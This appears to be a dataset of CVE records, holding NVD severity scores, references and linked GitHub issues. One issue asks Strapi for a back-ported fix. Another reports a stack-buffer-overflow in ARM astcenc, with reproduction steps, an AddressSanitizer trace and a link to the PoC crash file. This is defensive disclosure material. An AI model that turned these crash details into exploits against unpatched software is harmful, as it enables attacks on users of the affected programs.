{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L", "version": "3.0" }, "exploitabilityScore": 0.6, "impactScore": 5.5, "source": "security@huntr.dev", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security@huntr.dev", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/strapi/strapi/commit/2a3f5e988be6a2c7dae5ac22b9e86d579b462f4c" }, { "source": "security@huntr.dev", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strapi/strapi/issues/12879" }, { "source": "security@huntr.dev", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/bounties/001d1c29-805a-4035-93bb-71a0e81da3e5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/strapi/strapi/commit/2a3f5e988be6a2c7dae5ac22b9e86d579b462f4c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strapi/strapi/issues/12879" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/bounties/001d1c29-805a-4035-93bb-71a0e81da3e5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*", "matchCriteriaId": "412D3B41-C0FD-4ED9-AD6B-00C83BEBC0C7", "versionEndExcluding": "4.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/strapi/strapi/issues/12879
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strapi", "strapi" ]
<!-- Hello 👋 Thank you for submitting an issue. Before you start, please make sure your issue is understandable and reproducible. To make your issue readable make sure you use valid Markdown syntax. https://guides.github.com/features/mastering-markdown/ Please ensure you have also read and understand the contributing guide. https://github.com/strapi/strapi/blob/master/CONTRIBUTING.md#reporting-an-issue --> ## Bug report ### Describe the bug There is a security vulnerability in Strapi that prevents our deployment pipeline from running. There is already a fix implemented for v4.x, but upgrading is not on our short-term road map for now. It seems like the fix from v4 can be copied to v3 1 on 1, but since I've never contributed to this repository I was hoping there was someone willing to back-port the fix to v3. ### Other information - Vulnerability on nist.gov: [CVE-2022-0764](https://nvd.nist.gov/vuln/detail/CVE-2022-0764) - Explanation on huntr.dev: https://huntr.dev/bounties/001d1c29-805a-4035-93bb-71a0e81da3e5/ - Commit to v4 that fixes the issue: https://github.com/strapi/strapi/commit/2a3f5e988be6a2c7dae5ac22b9e86d579b462f4c
[V3] Fix CVE-2022-0764
https://api.github.com/repos/strapi/strapi/issues/12879/comments
2
2022-03-17T15:16:11Z
2022-05-18T08:01:30Z
https://github.com/strapi/strapi/issues/12879
1,172,466,248
12,879
3,244
CVE-2021-43086
2022-02-28T15:15:07.983
ARM astcenc 3.2.0 is vulnerable to Buffer Overflow. When the compression function of the astc-encoder project with -cl option was used, a stack-buffer-overflow occurred in function encode_ise() in function compress_symbolic_block_for_partition_2planes() in "/Source/astcenc_compress_symbolic.cpp".
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ARM-software/astc-encoder/issues/296." }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ARM-software/astc-encoder/issues/296." } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:arm:adaptive_scalable_texture_compression_encoder:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "DC0AA123-0F53-4A6E-980E-4539FBAB8242", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ARM-software/astc-encoder/issues/296.
[ "Broken Link", "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ARM-software", "astc-encoder" ]
# Version ``` astcenc v3.2.0, 64-bit sse2 ``` # Environment Ubuntu 18.04,64 bit # Command **Compile test program:** ```c++ $ mkdir build $ cd build $ cmake -G "Unix Makefiles" -DCMAKE_BUILD_TYPE=Release .. $ make -j8 ``` **Compile test program with address sanitizer:** - Update Makefile: ``` $ set(CMAKE_C_COMPILER "/usr/bin/gcc") $ set(CMAKE_CXX_COMPILER "/usr/bin/g++") $ set(CMAKE_C_FLAGS "-fsanitize=address") $ set(CMAKE_CXX_FLAGS "-fsanitize=address") ``` - Compile program: ``` $ mkdir -p asan_build $ cd asan_build $ cmake -G "Unix Makefiles" -DCMAKE_BUILD_TYPE=Release .. $ make -j8 ``` # Result The result of running without ASAN: ``` $ ./astcenc-native -cl crash04 out4.astc 6x6 -medium Source image ============ Source: /docker/astc_test/sync_out/fuzzer03/crashes/id:000036,sig:06,src:000005,time:2403523,op:havoc,rep:8 Color profile: HDR Dimensions: 2D, 8x8 Components: 4 Compressor settings =================== Color profile: LDR linear Block size: 6x6 Bitrate: 3.56 bpp Radius mean/stdev: 0 texels RGB power: 1 RGB base weight: 1 RGB mean weight: 0 RGB stdev weight: 0 RGB mean/stdev mixing: 0 Alpha power: 1 Alpha base weight: 1 Alpha mean weight: 0 Alpha stdev weight: 0 RGB alpha scale weight: 0 R component weight: 1 G component weight: 1 B component weight: 1 A component weight: 1 Deblock artifact setting: 0 Partition cutoff: 4 partitions Partition index cutoff: 26 partition ids PSNR cutoff: 40.5294 dB 2.2+ partition cutoff: 1.2 3.2+ partition cutoff: 1.25 2 plane correlation cutoff: 0.75 Block mode centile cutoff: 76% Max refinement cutoff: 3 iterations Compressor thread count: 28 Performance metrics =================== Total time: 0.0113 s Coding time: 0.0027 s Coding rate: 0.0238 MT/s ``` Information obtained by using ASAN: ``` $ ./astcenc-native_asan -cl crash04 out4.astc 6x6 -medium ================================================================= ==18329==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f43380d1660 at pc 0x558bad7dc1c2 bp 0x7f43380cd760 sp 0x7f43380cd750 READ of size 4 at 0x7f43380d1660 thread T1 #0 0x558bad7dc1c1 in compress_symbolic_block_for_partition_2planes(astcenc_config const&, block_size_descriptor const&, image_block const&, error_weight_block const&, float, unsigned int, symbolic_compressed_block&, compression_working_buffers&) (/docker/astc_test/te/Source/astcenc-native+0xbc1c1) #1 0x558bad7e691a in compress_image(astcenc_context&, unsigned int, astcenc_image const&, astcenc_swizzle const&, unsigned char*) (/docker/astc_test/te/Source/astcenc-native+0xc691a) #2 0x558bad7ed382 in astcenc_compress_image(astcenc_context*, astcenc_image*, astcenc_swizzle const*, unsigned char*, unsigned long, unsigned int) (/docker/astc_test/te/Source/astcenc-native+0xcd382) #3 0x558bad79cc33 in compression_workload_runner(int, int, void*) (/docker/astc_test/te/Source/astcenc-native+0x7cc33) #4 0x558bad799c53 in launch_threads_helper(void*) [clone .lto_priv.0] (/docker/astc_test/te/Source/astcenc-native+0x79c53) #5 0x7f433d8b8608 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9608) #6 0x7f433dd47292 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122292) Address 0x7f43380d1660 is located in stack of thread T1 at offset 15504 in frame #0 0x558bad7ce27f in compress_symbolic_block_for_partition_2planes(astcenc_config const&, block_size_descriptor const&, image_block const&, error_weight_block const&, float, unsigned int, symbolic_compressed_block&, compression_working_buffers&) (/docker/astc_test/te/Source/astcenc-native+0xae27f) This frame has 480 object(s): [48, 49) 'rgb_hdr' (line 97) [64, 65) 'alpha_hdr' (line 98) [80, 96) 'err_mask' (line 668) [112, 128) 'err_max' (line 667) [144, 160) 'use_ep2' (line 664) [176, 192) 'ep2' (line 663) [208, 224) 'use_ep1' (line 660) [240, 256) 'ep1' (line 659) [272, 288) 'min_ep2' (line 657) [304, 320) 'min_ep1' (line 656) [336, 352) 'rgbo_color' (line 801) [368, 384) 'rgbs_color' (line 800) [400, 416) '<unknown>' [432, 448) '<unknown>' [464, 480) '<unknown>' [496, 512) '<unknown>' [528, 544) '<unknown>' [560, 576) '<unknown>' [592, 608) '<unknown>' [624, 640) '<unknown>' [656, 672) '<unknown>' [688, 704) '<unknown>' [720, 736) '<unknown>' [752, 768) '<unknown>' [784, 800) '<unknown>' [816, 832) '<unknown>' [848, 864) '<unknown>' [880, 896) '<unknown>' [912, 928) '<unknown>' [944, 960) '<unknown>' [976, 992) '<unknown>' [1008, 1024) '<unknown>' [1040, 1056) '<unknown>' [1072, 1088) '<unknown>' [1104, 1120) '<unknown>' [1136, 1152) '<unknown>' [1168, 1184) '<unknown>' [1200, 1216) '<unknown>' [1232, 1248) '<unknown>' [1264, 1280) '<unknown>' [1296, 1312) '<unknown>' [1328, 1344) '<unknown>' [1360, 1376) '<unknown>' [1392, 1408) '<unknown>' [1424, 1440) '<unknown>' [1456, 1472) '<unknown>' [1488, 1504) '<unknown>' [1520, 1536) 'lane_mask' [1552, 1568) 'color_mask' [1584, 1600) '<unknown>' [1616, 1632) '<unknown>' [1648, 1664) '<unknown>' [1680, 1696) '<unknown>' [1712, 1728) '<unknown>' [1744, 1760) 'error_summav' [1776, 1792) 'current_values1' [1808, 1824) 'actual_values1' [1840, 1856) 'diff' [1872, 1888) 'error1' [1904, 1920) 'current_values2' [1936, 1952) 'actual_values2' [1968, 1984) 'error2' [2000, 2016) 'current_values1' [2032, 2048) 'actual_values1' [2064, 2080) 'diff' [2096, 2112) 'error1' [2128, 2144) 'current_values2' [2160, 2176) 'actual_values2' [2192, 2208) 'error2' [2224, 2240) '<unknown>' [2256, 2272) '<unknown>' [2288, 2304) '<unknown>' [2320, 2336) '<unknown>' [2352, 2368) '<unknown>' [2384, 2400) '<unknown>' [2416, 2432) '<unknown>' [2448, 2464) '<unknown>' [2480, 2496) '<unknown>' [2512, 2528) '<unknown>' [2544, 2560) '<unknown>' [2576, 2592) '<unknown>' [2608, 2624) '<unknown>' [2640, 2656) '<unknown>' [2672, 2688) '<unknown>' [2704, 2720) '<unknown>' [2736, 2752) '<unknown>' [2768, 2784) '<unknown>' [2800, 2816) '<unknown>' [2832, 2848) '<unknown>' [2864, 2880) '<unknown>' [2896, 2912) '<unknown>' [2928, 2944) '<unknown>' [2960, 2976) '<unknown>' [2992, 3008) '<unknown>' [3024, 3040) '<unknown>' [3056, 3072) '<unknown>' [3088, 3104) 'weight_idx0' [3120, 3136) 'weight_idx1' [3152, 3168) 'weight_idx2' [3184, 3200) 'weight_idx3' [3216, 3232) 'weight_val0' [3248, 3264) 'weight_val1' [3280, 3296) 'weight_val2' [3312, 3328) 'weight_val3' [3344, 3360) 'tex_weight_float0' [3376, 3392) 'tex_weight_float1' [3408, 3424) 'tex_weight_float2' [3440, 3456) 'tex_weight_float3' [3472, 3488) '<unknown>' [3504, 3520) '<unknown>' [3536, 3552) '<unknown>' [3568, 3584) '<unknown>' [3600, 3616) '<unknown>' [3632, 3648) '<unknown>' [3664, 3680) '<unknown>' [3696, 3712) '<unknown>' [3728, 3744) '<unknown>' [3760, 3776) '<unknown>' [3792, 3808) '<unknown>' [3824, 3840) '<unknown>' [3856, 3872) '<unknown>' [3888, 3904) '<unknown>' [3920, 3936) '<unknown>' [3952, 3968) 'weight_idx0' [3984, 4000) 'weight_idx1' [4016, 4032) 'weight_idx2' [4048, 4064) 'weight_idx3' [4080, 4096) 'weight_val0' [4112, 4128) 'weight_val1' [4144, 4160) 'weight_val2' [4176, 4192) 'weight_val3' [4208, 4224) 'tex_weight_float0' [4240, 4256) 'tex_weight_float1' [4272, 4288) 'tex_weight_float2' [4304, 4320) 'tex_weight_float3' [4336, 4352) '<unknown>' [4368, 4384) '<unknown>' [4400, 4416) '<unknown>' [4432, 4448) '<unknown>' [4464, 4480) '<unknown>' [4496, 4512) '<unknown>' [4528, 4544) '<unknown>' [4560, 4576) '<unknown>' [4592, 4608) '<unknown>' [4624, 4640) '<unknown>' [4656, 4672) '<unknown>' [4688, 4704) '<unknown>' [4720, 4736) '<unknown>' [4752, 4768) '<unknown>' [4784, 4800) '<unknown>' [4816, 4832) 'rgba_sum' [4848, 4864) 'rgba_weight_sum' [4880, 4896) 'scale_direction' [4912, 4928) 'left_sum' [4944, 4960) 'middle_sum' [4976, 4992) 'right_sum' [5008, 5024) 'left2_sum' [5040, 5056) 'middle2_sum' [5072, 5088) 'right2_sum' [5104, 5120) 'lmrs_sum' [5136, 5152) 'color_vec_x' [5168, 5184) 'color_vec_y' [5200, 5216) 'scale_vec' [5232, 5248) 'weight_weight_sum' [5264, 5280) 'rgbq_sum' [5296, 5312) 'sds' [5328, 5344) 'v0' [5360, 5376) 'v1' [5392, 5408) 'avg' [5424, 5440) 'ep0' [5456, 5472) 'color_det2' [5488, 5504) 'color_rdet2' [5520, 5536) 'color_mss2' [5552, 5568) 'ep0' [5584, 5600) 'ep1' [5616, 5632) 'p2_mask' [5648, 5664) 'det_mask' [5680, 5696) 'notnan_mask' [5712, 5728) 'full_mask' [5744, 5760) 'avg' [5776, 5792) 'p2_mask' [5808, 5824) 'notnan_mask' [5840, 5856) 'full_mask' [5872, 5888) 'color_det1' [5904, 5920) 'color_rdet1' [5936, 5952) 'color_mss1' [5968, 5984) 'ep0' [6000, 6016) 'ep1' [6032, 6048) 'p1_mask' [6064, 6080) 'det_mask' [6096, 6112) 'notnan_mask' [6128, 6144) 'full_mask' [6160, 6176) 'sdsm' [6192, 6208) 'avg' [6224, 6240) 'p1_mask' [6256, 6272) 'notnan_mask' [6288, 6304) 'full_mask' [6320, 6336) 'rgba' [6352, 6368) 'color_weight' [6384, 6400) 'left' [6416, 6432) 'middle' [6448, 6464) 'right' [6480, 6496) 'lmrs' [6512, 6528) 'left2' [6544, 6560) 'middle2' [6576, 6592) 'right2' [6608, 6624) 'p2_mask' [6640, 6656) 'color_idx' [6672, 6688) 'cwprod' [6704, 6720) 'cwiprod' [6736, 6752) 'm' [6768, 6784) 'm' [6800, 6816) 'result' [6832, 6848) 'length' [6864, 6880) 'm' [6896, 6912) 'm' [6928, 6944) '<unknown>' [6960, 6976) '<unknown>' [6992, 7008) '<unknown>' [7024, 7040) '<unknown>' [7056, 7072) '<unknown>' [7088, 7104) '<unknown>' [7120, 7136) '<unknown>' [7152, 7168) '<unknown>' [7184, 7200) '<unknown>' [7216, 7232) '<unknown>' [7248, 7264) '<unknown>' [7280, 7296) '<unknown>' [7312, 7328) '<unknown>' [7344, 7360) '<unknown>' [7376, 7392) '<unknown>' [7408, 7424) '<unknown>' [7440, 7456) '<unknown>' [7472, 7488) '<unknown>' [7504, 7520) '<unknown>' [7536, 7552) '<unknown>' [7568, 7584) '<unknown>' [7600, 7616) '<unknown>' [7632, 7648) '<unknown>' [7664, 7680) '<unknown>' [7696, 7712) '<unknown>' [7728, 7744) '<unknown>' [7760, 7776) '<unknown>' [7792, 7808) '<unknown>' [7824, 7840) '<unknown>' [7856, 7872) '<unknown>' [7888, 7904) '<unknown>' [7920, 7936) '<unknown>' [7952, 7968) '<unknown>' [7984, 8000) '<unknown>' [8016, 8032) '<unknown>' [8048, 8064) '<unknown>' [8080, 8096) '<unknown>' [8112, 8128) '<unknown>' [8144, 8160) '<unknown>' [8176, 8192) '<unknown>' [8208, 8224) '<unknown>' [8240, 8256) '<unknown>' [8272, 8288) '<unknown>' [8304, 8320) '<unknown>' [8336, 8352) '<unknown>' [8368, 8384) '<unknown>' [8400, 8416) '<unknown>' [8432, 8448) '<unknown>' [8464, 8480) '<unknown>' [8496, 8512) '<unknown>' [8528, 8544) '<unknown>' [8560, 8576) '<unknown>' [8592, 8608) '<unknown>' [8624, 8640) '<unknown>' [8656, 8672) '<unknown>' [8688, 8704) '<unknown>' [8720, 8736) '<unknown>' [8752, 8768) '<unknown>' [8784, 8800) '<unknown>' [8816, 8832) '<unknown>' [8848, 8864) '<unknown>' [8880, 8896) '<unknown>' [8912, 8928) '<unknown>' [8944, 8960) '<unknown>' [8976, 8992) '<unknown>' [9008, 9024) '<unknown>' [9040, 9056) '<unknown>' [9072, 9088) '<unknown>' [9104, 9120) '<unknown>' [9136, 9152) '<unknown>' [9168, 9184) '<unknown>' [9200, 9216) '<unknown>' [9232, 9248) '<unknown>' [9264, 9280) '<unknown>' [9296, 9312) '<unknown>' [9328, 9344) '<unknown>' [9360, 9376) '<unknown>' [9392, 9408) '<unknown>' [9424, 9440) '<unknown>' [9456, 9472) '<unknown>' [9488, 9504) '<unknown>' [9520, 9536) '<unknown>' [9552, 9568) '<unknown>' [9584, 9600) '<unknown>' [9616, 9632) '<unknown>' [9648, 9664) '<unknown>' [9680, 9696) '<unknown>' [9712, 9728) '<unknown>' [9744, 9760) '<unknown>' [9776, 9792) '<unknown>' [9808, 9824) '<unknown>' [9840, 9856) '<unknown>' [9872, 9888) '<unknown>' [9904, 9920) '<unknown>' [9936, 9952) '<unknown>' [9968, 9984) '<unknown>' [10000, 10016) '<unknown>' [10032, 10048) '<unknown>' [10064, 10080) '<unknown>' [10096, 10112) '<unknown>' [10128, 10144) '<unknown>' [10160, 10176) '<unknown>' [10192, 10208) '<unknown>' [10224, 10240) '<unknown>' [10256, 10272) '<unknown>' [10288, 10304) '<unknown>' [10320, 10336) '<unknown>' [10352, 10368) '<unknown>' [10384, 10400) '<unknown>' [10416, 10432) '<unknown>' [10448, 10464) '<unknown>' [10480, 10496) '<unknown>' [10512, 10528) '<unknown>' [10544, 10560) '<unknown>' [10576, 10592) '<unknown>' [10608, 10624) '<unknown>' [10640, 10656) '<unknown>' [10672, 10688) '<unknown>' [10704, 10720) '<unknown>' [10736, 10752) '<unknown>' [10768, 10784) '<unknown>' [10800, 10816) '<unknown>' [10832, 10848) '<unknown>' [10864, 10880) '<unknown>' [10896, 10912) '<unknown>' [10928, 10944) '<unknown>' [10960, 10976) '<unknown>' [10992, 11008) '<unknown>' [11024, 11040) '<unknown>' [11056, 11072) '<unknown>' [11088, 11104) '<unknown>' [11120, 11136) '<unknown>' [11152, 11168) '<unknown>' [11184, 11200) '<unknown>' [11216, 11232) '<unknown>' [11248, 11264) '<unknown>' [11280, 11296) '<unknown>' [11312, 11328) '<unknown>' [11344, 11360) '<unknown>' [11376, 11392) '<unknown>' [11408, 11424) '<unknown>' [11440, 11456) '<unknown>' [11472, 11488) '<unknown>' [11504, 11520) '<unknown>' [11536, 11552) '<unknown>' [11568, 11584) '<unknown>' [11600, 11616) '<unknown>' [11632, 11648) '<unknown>' [11664, 11680) '<unknown>' [11696, 11712) '<unknown>' [11728, 11744) '<unknown>' [11760, 11776) '<unknown>' [11792, 11808) '<unknown>' [11824, 11840) '<unknown>' [11856, 11872) '<unknown>' [11888, 11904) '<unknown>' [11920, 11936) '<unknown>' [11952, 11968) '<unknown>' [11984, 12000) '<unknown>' [12016, 12032) '<unknown>' [12048, 12064) '<unknown>' [12080, 12096) '<unknown>' [12112, 12128) '<unknown>' [12144, 12160) '<unknown>' [12176, 12192) '<unknown>' [12208, 12224) '<unknown>' [12240, 12256) '<unknown>' [12272, 12288) '<unknown>' [12304, 12320) '<unknown>' [12336, 12352) '<unknown>' [12368, 12384) '<unknown>' [12400, 12416) '<unknown>' [12432, 12448) '<unknown>' [12464, 12480) '<unknown>' [12496, 12512) 'mat0' [12528, 12544) 'mat1' [12560, 12576) 'mat2' [12592, 12608) 'mat3' [12624, 12640) 'vect' [12656, 12672) 'm' [12688, 12704) 'm' [12720, 12736) 'm' [12752, 12768) 'm' [12784, 12800) '<unknown>' [12816, 12832) '<unknown>' [12848, 12864) '<unknown>' [12880, 12896) '<unknown>' [12912, 12928) '<unknown>' [12944, 12960) '<unknown>' [12976, 12992) '<unknown>' [13008, 13024) 'plane_mask' (line 94) [13040, 13056) 'color_offset' (line 186) [13072, 13088) 'color_base' (line 187) [13104, 13120) 'color' (line 189) [13136, 13152) 'origcolor' (line 191) [13168, 13184) 'error_weight' (line 192) [13200, 13216) 'colordiff' (line 194) [13232, 13248) 'color_up_diff' (line 195) [13264, 13280) 'color_down_diff' (line 196) [13296, 13312) 'm' [13328, 13344) 'm' [13360, 13376) 'm' [13392, 13408) 'epd' (line 128) [13424, 13440) '<unknown>' [13456, 13472) '<unknown>' [13488, 13504) '<unknown>' [13520, 13536) '<unknown>' [13552, 13568) '<unknown>' [13584, 13600) '<unknown>' [13616, 13632) '<unknown>' [13648, 13664) '<unknown>' [13680, 13696) '<unknown>' [13712, 13728) '<unknown>' [13744, 13760) '<unknown>' [13776, 13792) '<unknown>' [13808, 13824) '<unknown>' [13840, 13856) '<unknown>' [13872, 13888) '<unknown>' [13904, 13920) '<unknown>' [13936, 13952) '<unknown>' [13968, 13984) '<unknown>' [14000, 14016) '<unknown>' [14032, 14048) '<unknown>' [14064, 14080) '<unknown>' [14096, 14112) '<unknown>' [14128, 14144) '<unknown>' [14160, 14176) '<unknown>' [14192, 14208) '<unknown>' [14224, 14240) '<unknown>' [14256, 14272) '<unknown>' [14288, 14304) '<unknown>' [14320, 14336) 'color_quant_level_mod' (line 764) [14352, 14368) 'color_quant_level' (line 763) [14384, 14400) 'block_mode_index' (line 761) [14416, 14432) 'idx' [14448, 14464) 'idx' [14480, 14496) 'idx' [14512, 14528) 'idx' [14544, 14560) 'idx' [14576, 14592) 'idx' [14608, 14624) 'idx' [14640, 14656) 'idx' [14672, 14688) 'idx' [14704, 14720) 'idx' [14736, 14800) 'partition_format_specifiers' (line 760) [14832, 14896) 'endpnt0' (line 99) [14928, 14992) 'endpnt1' (line 100) [15024, 15088) 'endpnt0f' (line 101) [15120, 15184) 'offset' (line 102) [15216, 15332) 'workscb' (line 803) [15376, 15504) 'dec_weights_quant_uvalue_plane1' <== Memory access at offset 15504 overflows this variable [15536, 15664) 'dec_weights_quant_uvalue_plane2' [15696, 15840) 'epm' (line 766) [15904, 20080) 'low_values1' [20336, 24512) 'high_values1' [24768, 28944) 'low_values2' [29200, 33376) 'high_values2' [33632, 41824) 'qwt_errors' (line 695) [42080, 50272) 'qwt_bitcounts' (line 694) [50528, 58720) 'weight_high_value2' (line 681) [58976, 67168) 'weight_low_value2' (line 680) [67424, 75616) 'weight_high_value1' (line 679) [75872, 84064) 'weight_low_value1' (line 678) [84320, 84384) 'uq_pl_weights' (line 118) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) Thread T1 created by T0 here: #0 0x7f433de6ea95 in __interceptor_pthread_create (/lib/x86_64-linux-gnu/libasan.so.6+0x57a95) #1 0x558bad8470b0 in launch_threads(int, void (*)(int, int, void*), void*) [clone .constprop.0] (/docker/astc_test/te/Source/astcenc-native+0x1270b0) SUMMARY: AddressSanitizer: stack-buffer-overflow (/docker/astc_test/te/Source/astcenc-native+0xbc1c1) in compress_symbolic_block_for_partition_2planes(astcenc_config const&, block_size_descriptor const&, image_block const&, error_weight_block const&, float, unsigned int, symbolic_compressed_block&, compression_working_buffers&) Shadow bytes around the buggy address: 0x0fe8e7012270: 00 00 00 00 f2 f2 f2 f2 00 00 00 00 00 00 00 00 0x0fe8e7012280: f2 f2 f2 f2 00 00 00 00 00 00 00 00 f2 f2 f2 f2 0x0fe8e7012290: 00 00 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00 0x0fe8e70122a0: 00 00 00 00 f2 f2 f2 f2 00 00 00 00 00 00 00 00 0x0fe8e70122b0: 00 00 00 00 00 00 04 f2 f2 f2 f2 f2 00 00 00 00 =>0x0fe8e70122c0: 00 00 00 00 00 00 00 00 00 00 00 00[f2]f2 f2 f2 0x0fe8e70122d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe8e70122e0: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe8e70122f0: 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f8 f8 0x0fe8e7012300: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x0fe8e7012310: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==18329==ABORTING ``` # Description ``` A stack-buffer-overflow discovered in astcenc. The issue is being triggered in function aompress_symbolic_block_for_partition_2planes().However, the program can still get the correct results without asan. ``` # Poc Poc file is [this](https://github.com/NISL-SecurityGroup/NISL-BugDetection/blob/main/project/astc-encoder/stack-buffer-overflow-3/crash04).
stack-buffer-overflow in function compress_symbolic_block_for_partition_2planes()
https://api.github.com/repos/ARM-software/astc-encoder/issues/296/comments
5
2021-10-22T05:18:39Z
2022-05-02T05:20:47Z
https://github.com/ARM-software/astc-encoder/issues/296
1,033,189,620
296
3,245
CVE-2021-44334
2022-02-28T15:15:08.037
David Brackeen ok-file-formats 97f78ca is vulnerable to Buffer Overflow. When the function of the ok-file-formats project is used, a heap-buffer-overflow occurs in function ok_jpg_convert_YCbCr_to_RGB() in "/ok_jpg.c:513" .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/12" } ]
